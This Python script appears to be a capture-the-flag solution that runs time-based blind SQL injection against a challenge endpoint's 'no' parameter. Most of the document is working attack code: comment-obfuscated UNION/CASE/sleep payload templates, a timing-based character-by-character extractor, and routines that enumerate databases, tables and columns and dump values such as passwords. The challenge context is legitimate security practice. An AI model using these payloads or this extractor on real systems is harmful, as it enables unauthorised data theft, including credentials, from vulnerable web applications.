脚本
# encoding:utf-8
import hashlib
import requests
import re
import time
import string
# Candidate set for each per-position guess; get() appends "_{}#-%();:" to it
# at call time, so punctuation common in names is covered there, not here.
characters = string.ascii_letters + string.digits
# Upper bound on the length of an extracted value: get() walks positions
# 1..max_length-1 and falls off the end (returning None) if every one matched.
max_length = 200
# Challenge endpoint; the injected value is appended verbatim to the `no=`
# query-string parameter (no URL-encoding is applied before sending).
target = 'http://1eb82f8a-5494-47fc-88af-8bdd6e607c1f.node3.buuoj.cn/view.php?no='
# Time-based blind template for listing schema names: `{0}` is the 1-based
# character position, `{1}` the guessed character; a correct guess makes the
# server sleep(4), which get() observes as a 3 s ReadTimeout.
# Only referenced from the commented-out call under __main__.
cur_database = "-1/**/union/**/select 1,/**/(case/**/when/**/(mid((select/**/group_concat(schema_name/**/separator'@')/**/from/**/information_schema/**/./**/schemata)/**/from/**/{0}/**/for/**/1)='{1}')/**/then/**/sleep(4)/**/else/**/1/**/end),3,4-- -"
def get(payload: str) -> str | None:
    """Extract a string one character at a time via a time-based blind probe.

    `payload` is a format template with two slots: `{0}` receives the
    1-based character position and `{1}` the candidate character. For each
    position every candidate is sent as `target + payload_`; a request that
    exceeds the 3 s timeout (i.e. the server-side sleep(4) fired) is taken
    as a hit and that character is appended.

    Returns the accumulated string as soon as a position yields no hit.
    Returns None implicitly if every position up to max_length - 1 matched
    (the partial result is lost in that case).

    Raises any requests error other than ReadTimeout (ConnectionError,
    ConnectTimeout, ...) — those are not caught.
    """
    flag = ''
    for i in range(1, max_length):
        next_position = False
        # Extra punctuation covers characters common in flag/table/column names.
        for char in characters+"_{}#-%();:":
            payload_ = payload.format(str(i), char)
            print("payload为:%s"%payload_)  # "payload is: ..."
            try:
                r = requests.get(target+payload_, timeout=3)
                # The response body is never read; only the timing matters.
                r.encoding = 'utf-8'
                # debug hook, disabled: print the response body ("响应为" = "response is")
                #print("响应为:%s"%r.text)
                time.sleep(0.1)  # pace requests between non-matching guesses
            except requests.exceptions.ReadTimeout:
                # NOTE(review): a network stall longer than 3 s is
                # indistinguishable from the sleep(4) signal, so a slow link
                # yields a wrong character; hits are never re-verified.
                flag += char
                print(flag)
                next_position = True
                break
        if not next_position:
            return flag
# Given a database name, enumerate up to five of its table names and, for
# each name found, enumerate that table's columns via get_col().
def get_table(database: str) -> None:
    """Enumerate table names in `database` (at most 5) and their columns.

    Each name is fetched through get() with a time-based blind template over
    information_schema.tables, using `limit 1 offset i` to step through the
    rows. Returns None, so `table1 = get_table(...)` under __main__ is
    always None; the enumeration result only appears in printed output.

    Raises TypeError if get() returns None (value longer than max_length),
    because the result is string-concatenated before any check.
    """
    for i in range(0,5):
        print("正在查询数据库" + database + "中的表")  # "querying tables in database ..."
        payload = "-1 union/**/select 1, (case when (substring((" \
            "select table_name from information_schema.tables where table_schema='"+ database + "' limit 1 offset "+ str(i) +") " \
            "from {0} for 1)='{1}') " \
            "then sleep(4) else 1 end),3,4-- -"
        table = get(payload)
        print( "数据库" + database + "的第"+ str(i+1) +"个表"+table)  # "table #i+1 of database ... is"
        # NOTE(review): called before the empty check, so once no table is
        # left at this offset get_col('') still runs a full, futile pass.
        get_col(table)
        if not table:
            print('数据库'+database+'中的表查询完毕')  # "finished querying tables in database ..."
            break
# Enumerate the column names of one table (at most 5) and print them.
def get_col(table: str) -> None:
    """Enumerate column names of `table` (at most 5) and print them.

    Uses the same time-based blind template as get_table(), over
    information_schema.columns. The filter is on table_name only — there is
    no table_schema clause — so a same-named table in another schema would
    contribute its columns too. Returns None; the accumulated `columns`
    string is only printed.

    Raises TypeError if get() returns None, because the result is
    string-concatenated before any check.
    """
    columns = "";
    for i in range(0, 5):
        print("正在查询表" + table + "中的字段")  # "querying columns of table ..."
        payload = "-1 union/**/select 1,( case when (substring((" \
            "select column_name from information_schema.columns where table_name='"+ table +"' limit 1 offset "+ str(i) +") " \
            "from {0} for 1)='{1}') " \
            "then sleep(4) else 1 end),3,4-- -"
        column = get(payload)
        print("表" + table + "的第" + str(i+1) + "个字段为" + column )  # "column #i+1 of table ... is"
        # print(column)
        # Space-separated running list, printed once enumeration stops.
        columns+=column+' '
        if not column:
            print("表" + table + "中的字段查询完毕 " + columns)  # "finished querying columns of table ...; columns:"
            break
# Standalone helper: dump up to five values of one column from a table.
def result(column: str, table: str) -> None:
    """Print up to five row values of `column` from `table`, one per row.

    Each value goes through get() with `limit 1 offset i`. Returns None.

    NOTE(review): unlike the templates above, this one opens with `-1'and`
    and terminates with ` #` — a string-quoted-context variant. It is
    presumably written for a different injection context and is not
    exercised against the `no=` endpoint above; only reachable through the
    commented-out call under __main__.
    """
    for i in range(0, 5):
        payload = "-1'and (select case when (substring((select "+column+" from "+table+" limit 1 offset " + str(i)+ ") from {0} for 1)='{1}') " \
            "then sleep(4) else 1 end) #"
        print(get(payload))
if __name__ == "__main__":
    # The schema-listing step is disabled; the run starts from a known
    # database name instead.
    #database1 = get(cur_database)
    # get_table() returns None, so table1 is always None — all results are
    # delivered through printed output during enumeration.
    table1 = get_table('fakebook')
    # Per-column value dump is disabled; result() is not called by default.
    #result("password", "user")